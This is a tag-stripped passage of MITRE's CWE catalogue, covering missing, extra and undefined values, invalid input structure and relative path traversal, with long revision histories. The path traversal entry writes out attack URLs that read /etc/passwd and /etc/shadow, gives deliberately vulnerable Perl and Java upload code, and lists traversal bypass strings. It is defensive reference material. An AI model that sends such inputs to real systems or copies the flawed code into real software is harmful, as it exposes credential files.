2008-09-08 + updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Applicable_Platforms, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Functional_Areas, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Description, Name, Relationships, Time_of_Introduction, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-08-20 + updated Description, Name, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Potential_Mitigations, Relationships, Research_Gaps + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Sensitive Information Uncleared Before Use + Sensitive Information Uncleared Before Release + Sensitive Information Uncleared in Resource Before Release for Reuse + + + + The product does not handle or incorrectly handles input that is not syntactically well-formed with respect to the associated specification. + + + + + + + Implementation + + + + + Integrity + Availability + Unexpected State + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + If an input is syntactically invalid, then processing the input could place the system in an unexpected state that could lead to a crash, consume available system resources or other unintended behaviors. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + This Android application has registered to handle a URL when sent an intent: + + + + ... + IntentFilter filter = new IntentFilter("com.example.URLHandler.openURL");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); + ... + + public class UrlHandlerReceiver extends BroadcastReceiver { + @Overridepublic void onReceive(Context context, Intent intent) { + if("com.example.URLHandler.openURL".equals(intent.getAction())) {String URL = intent.getStringExtra("URLToOpen");int length = URL.length(); + + ... + } + } + } + + The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called. + + + + + Structure and Validity Problems + + + A7 + Improper Error Handling + CWE More Specific + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This entry needs more investigation. Public vulnerability research generally focuses on the manipulations that generate invalid structure, instead of the weaknesses that are exploited by those manipulations. For example, a common attack involves making a request that omits a required field, which can trigger a crash in some cases. The crash could be due to a named chain such as CWE-690 (Unchecked Return Value to NULL Pointer Dereference), but public reports rarely cover this aspect of a vulnerability. + The validity of input could be roughly classified along "syntactic", "semantic", and "lexical" dimensions. If the specification requires that an input value should be delimited with the "[" and "]" square brackets, then any input that does not follow this specification would be syntactically invalid. If the input between the brackets is expected to be a number, but the letters "aaa" are provided, then the input is syntactically invalid. If the input is a number and enclosed in brackets, but the number is outside of the allowable range, then it is semantically invalid. The inter-relationships between these properties - and their associated weaknesses- need further exploration. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Maintenance_Notes, Name, Relationships, Relevant_Properties, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relevant_Properties + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Maintenance_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Structure and Validity Problems + Failure to Handle Syntactically Invalid Structure + + + + The product does not properly handle when the expected number of values for parameters, fields, or arguments is not provided in input, or if those values are undefined. + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Description, Type + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Value Problems + + + + The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory. + This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. + + + + + + + + + + + Zip Slip + "Zip slip" is an attack that uses file archives (e.g., ZIP, tar, rar, etc.) that contain filenames with path traversal sequences that cause the files to be written outside of the directory under which the archive is expected to be extracted [REF-1282]. It is most commonly used for relative path traversal (CWE-23) and link following (CWE-59). + + + + + Implementation + + + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries. + + + Integrity + Modify Files or Directories + The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication. + + + Confidentiality + Read Files or Directories + The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system. + + + Availability + DoS: Crash, Exit, or Restart + The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the product from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the product. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + + + Implementation + Input Validation + + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes: + + realpath() in C + getCanonicalPath() in Java + GetFullPath() in ASP.NET + realpath() or abs_path() in Perl + realpath() in PHP + + + + + + + The following URLs are vulnerable to this attack: + + http://example.com.br/get-files.jsp?file=report.pdfhttp://example.com.br/get-page.php?home=aaa.htmlhttp://example.com.br/some-page.asp?page=index.html + + A simple way to execute this attack is like this: + + http://example.com.br/get-files?file=../../../../somedir/somefilehttp://example.com.br/../../../../etc/shadowhttp://example.com.br/get-files?file=../../../../etc/passwd + + + + The following code could be for a social networking application in which each user's profile information is stored in a separate file. All files are stored in a single directory. + + my $dataPath = "/users/cwe/profiles";my $username = param("user");my $profilePath = $dataPath . "/" . $username; + open(my $fh, "<", $profilePath) || ExitError("profile read error: $profilePath");print "<ul>\n";while (<$fh>) {print "<li>$_</li>\n";}print "</ul>\n"; + + While the programmer intends to access files such as "/users/cwe/profiles/alice" or "/users/cwe/profiles/bob", there is no verification of the incoming user parameter. An attacker could provide a string such as: + + ../../../etc/passwd + + The program would generate a profile pathname like this: + + /users/cwe/profiles/../../../etc/passwd + + When the file is opened, the operating system resolves the "../" during path canonicalization and actually accesses this file: + + /etc/passwd + + As a result, the attacker could read the entire text of the password file. + Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because of the lack of output encoding of the file that is retrieved, there might also be a cross-site scripting problem (CWE-79) if profile contains any HTML, but other code would need to be examined. + + + The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet. + + <form action="FileUploadServlet" method="post" enctype="multipart/form-data"> + Choose a file to upload:<input type="file" name="filename"/><br/><input type="submit" name="submit" value="Submit"/> + </form> + + When submitted the Java servlet's doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory. + + public class FileUploadServlet extends HttpServlet { + + ... + protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + + response.setContentType("text/html");PrintWriter out = response.getWriter();String contentType = request.getContentType(); + // the starting position of the boundary headerint ind = contentType.indexOf("boundary=");String boundary = contentType.substring(ind+9); + String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value + // verify that content type is multipart form dataif (contentType != null && contentType.indexOf("multipart/form-data") != -1) { + + // extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf("\\"), pLine.lastIndexOf("\""));... + // output the file to the local upload directorytry { + BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {if (line.indexOf(boundary) == -1) {bw.write(line);bw.newLine();bw.flush();}} //end of for loopbw.close(); + + + } catch (IOException ex) {...}// output successful upload response HTML page + }// output unsuccessful upload response HTML pageelse{...} + }... + + } + + This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code. + Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use "../" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash. + + + + + CVE-2019-20916 + Python package manager does not correctly restrict the filename specified in a Content-Disposition header, allowing arbitrary file read using path traversal sequences such as "../" + https://www.cve.org/CVERecord?id=CVE-2019-20916 + + + CVE-2022-24877 + directory traversal in Go-based Kubernetes operator app allows accessing data from the controller's pod file system via ../ sequences in a yaml file + https://www.cve.org/CVERecord?id=CVE-2022-24877 + + + CVE-2020-4053 + a Kubernetes package manager written in Go allows malicious plugins to inject path traversal sequences into a plugin archive ("Zip slip") to copy a file outside the intended directory + https://www.cve.org/CVERecord?id=CVE-2020-4053 + + + CVE-2021-21972 + Chain: Cloud computing virtualization platform does not require authentication for upload of a tar format file (CWE-306), then uses .. path traversal sequences (CWE-23) in the file to access unexpected files, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-21972 + + + CVE-2019-10743 + Go-based archive library allows extraction of files to locations outside of the target folder with "../" path traversal sequences in filenames in a zip file, aka "Zip Slip" + https://www.cve.org/CVERecord?id=CVE-2019-10743 + + + CVE-2002-0298 + Server allows remote attackers to cause a denial of service via certain HTTP GET requests containing a %2e%2e (encoded dot-dot), several "/../" sequences, or several "../" in a URI. + https://www.cve.org/CVERecord?id=CVE-2002-0298 + + + CVE-2002-0661 + "\" not in denylist for web server, allowing path traversal attacks when the server is run in Windows and other OSes. + https://www.cve.org/CVERecord?id=CVE-2002-0661 + + + CVE-2002-0946 + Arbitrary files may be read files via ..\ (dot dot) sequences in an HTTP request. + https://www.cve.org/CVERecord?id=CVE-2002-0946 + + + CVE-2002-1042 + Directory traversal vulnerability in search engine for web server allows remote attackers to read arbitrary files via "..\" sequences in queries. + https://www.cve.org/CVERecord?id=CVE-2002-1042 + + + CVE-2002-1209 + Directory traversal vulnerability in FTP server allows remote attackers to read arbitrary files via "..\" sequences in a GET request. + https://www.cve.org/CVERecord?id=CVE-2002-1209 + + + CVE-2002-1178 + Directory traversal vulnerability in servlet allows remote attackers to execute arbitrary commands via "..\" sequences in an HTTP request. + https://www.cve.org/CVERecord?id=CVE-2002-1178 + + + CVE-2002-1987 + Protection mechanism checks for "/.." but doesn't account for Windows-specific "\.." allowing read of arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2002-1987 + + + CVE-2005-2142 + Directory traversal vulnerability in FTP server allows remote authenticated attackers to list arbitrary directories via a "\.." sequence in an LS command. + https://www.cve.org/CVERecord?id=CVE-2005-2142 + + + CVE-2002-0160 + The administration function in Access Control Server allows remote attackers to read HTML, Java class, and image files outside the web root via a "..\.." sequence in the URL to port 2002. + https://www.cve.org/CVERecord?id=CVE-2002-0160 + + + CVE-2001-0467 + "\..." in web server + https://www.cve.org/CVERecord?id=CVE-2001-0467 + + + CVE-2001-0963 + "..." in cd command in FTP server + https://www.cve.org/CVERecord?id=CVE-2001-0963 + + + CVE-2001-1193 + "..." in cd command in FTP server + https://www.cve.org/CVERecord?id=CVE-2001-1193 + + + CVE-2001-1131 + "..." in cd command in FTP server + https://www.cve.org/CVERecord?id=CVE-2001-1131 + + + CVE-2001-0480 + read of arbitrary files and directories using GET or CD with "..." in Windows-based FTP server. + https://www.cve.org/CVERecord?id=CVE-2001-0480 + + + CVE-2002-0288 + read files using "." and Unicode-encoded "/" or "\" characters in the URL. + https://www.cve.org/CVERecord?id=CVE-2002-0288 + + + CVE-2003-0313 + Directory listing of web server using "..." + https://www.cve.org/CVERecord?id=CVE-2003-0313 + + + CVE-2005-1658 + Triple dot + https://www.cve.org/CVERecord?id=CVE-2005-1658 + + + CVE-2000-0240 + read files via "/........../" in URL + https://www.cve.org/CVERecord?id=CVE-2000-0240 + + + CVE-2000-0773 + read files via "...." in web server + https://www.cve.org/CVERecord?id=CVE-2000-0773 + + + CVE-1999-1082 + read files via "......" in web server (doubled triple dot?) + https://www.cve.org/CVERecord?id=CVE-1999-1082 + + + CVE-2004-2121 + read files via "......" in web server (doubled triple dot?) + https://www.cve.org/CVERecord?id=CVE-2004-2121 + + + CVE-2001-0491 + multiple attacks using "..", "...", and "...." in different commands + https://www.cve.org/CVERecord?id=CVE-2001-0491 + + + CVE-2001-0615 + "..." or "...." in chat server + https://www.cve.org/CVERecord?id=CVE-2001-0615 + + + CVE-2005-2169 + chain: ".../...//" bypasses protection mechanism using regexp's that remove "../" resulting in collapse into an unsafe value "../" (CWE-182) and resultant path traversal. + https://www.cve.org/CVERecord?id=CVE-2005-2169 + + + CVE-2005-0202 + ".../....///" bypasses regexp's that remove "./" and "../" + https://www.cve.org/CVERecord?id=CVE-2005-0202 + + + CVE-2004-1670 + Mail server allows remote attackers to create arbitrary directories via a ".." or rename arbitrary files via a "....//" in user supplied parameters. + https://www.cve.org/CVERecord?id=CVE-2004-1670 + + + + + Relative Path Traversal + + + SFP16 + Path Traversal + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated Alternate_Terms, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Nick Johnston + 2022-07-11 + Identified weakness in Perl demonstrative example + + + + + The product does not handle or incorrectly handles when a parameter, field, or argument name is specified, but the associated value is missing, i.e. it is empty, blank, or null. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + This Android application has registered to handle a URL when sent an intent: + + + + ... + IntentFilter filter = new IntentFilter("com.example.URLHandler.openURL");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); + ... + + public class UrlHandlerReceiver extends BroadcastReceiver { + @Overridepublic void onReceive(Context context, Intent intent) { + if("com.example.URLHandler.openURL".equals(intent.getAction())) {String URL = intent.getStringExtra("URLToOpen");int length = URL.length(); + + ... + } + } + } + + The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called. + + + + + CVE-2002-0422 + Blank Host header triggers resultant infoleak. + https://www.cve.org/CVERecord?id=CVE-2002-0422 + + + CVE-2000-1006 + Blank "charset" attribute in MIME header triggers crash. + https://www.cve.org/CVERecord?id=CVE-2000-1006 + + + CVE-2004-1504 + Blank parameter causes external error infoleak. + https://www.cve.org/CVERecord?id=CVE-2004-1504 + + + CVE-2005-2053 + Blank parameter causes external error infoleak. + https://www.cve.org/CVERecord?id=CVE-2005-2053 + + + + + Missing Value Error + + + ERR08-J + Do not catch NullPointerException or any of its ancestors + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Some "crash by port scan" bugs are probably due to this, but lack of diagnosis makes it difficult to be certain. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Research_Gaps + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Type + + + CWE Content Team + MITRE + 2014-02-18 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Missing Value Error + Failure to Handle Missing Value + + + + The product does not handle or incorrectly handles when more values are provided than expected. + + + + + + + + + + Implementation + This typically occurs in situations when only one value is expected. + + + + + Integrity + Unexpected State + + + + + Extra Value Error + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This can overlap buffer overflows. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Modes_of_Introduction, Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Description, Type + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Time_of_Introduction + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Extra Value Error + Failure to Handle Extra Value + + + + The product does not handle or incorrectly handles when a value is not defined or supported for the associated parameter, field, or argument name. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + In this example, an address parameter is read and trimmed of whitespace. + + String address = request.getParameter("address");address = address.trim();String updateString = "UPDATE shippingInfo SET address='?' WHERE email='cwe@example.com'";emailAddress = con.prepareStatement(updateString);emailAddress.setString(1, address); + + If the value of the address parameter is null (undefined), the servlet will throw a NullPointerException when the trim() is attempted. + + + + + CVE-2000-1003 + Client crash when server returns unknown driver type. + https://www.cve.org/CVERecord?id=CVE-2000-1003 + + + + + Undefined Value Error + + + ERR08-J + Do not catch NullPointerException or any of its ancestors + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Type + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Undefined Value Error + Failure to Handle Undefined Value + + + + The product does not properly handle when the expected number of parameters, fields, or arguments is not provided in input, or if those parameters are undefined. + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + This Android application has registered to handle a URL when sent an intent: + + + + ... + IntentFilter filter = new IntentFilter("com.example.URLHandler.openURL");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); + ... + + public class UrlHandlerReceiver extends BroadcastReceiver { + @Overridepublic void onReceive(Context context, Intent intent) { + if("com.example.URLHandler.openURL".equals(intent.getAction())) {String URL = intent.getStringExtra("URLToOpen");int length = URL.length(); + + ... + } + } + } + + The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called. + + + + + Parameter Problems + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Description, Name, Type + + + CWE Content Team + MITRE + 2014-02-18 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Parameter Problems + + + + If too few arguments are sent to a function, the function will still pop the expected number of arguments from the stack. Potentially, a variable number of arguments could be exhausted in a function as well. + + + + + + + + + Implementation + + + High + + + Integrity + Confidentiality + Availability + Access Control + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + There is the potential for arbitrary code execution with privileges of the vulnerable program if function parameter list is exhausted. + + + Availability + DoS: Crash, Exit, or Restart + Potentially a program could fail if it needs more arguments then are available. + + + + + Build and Compilation + This issue can be simply combated with the use of proper build process. + + + Implementation + Forward 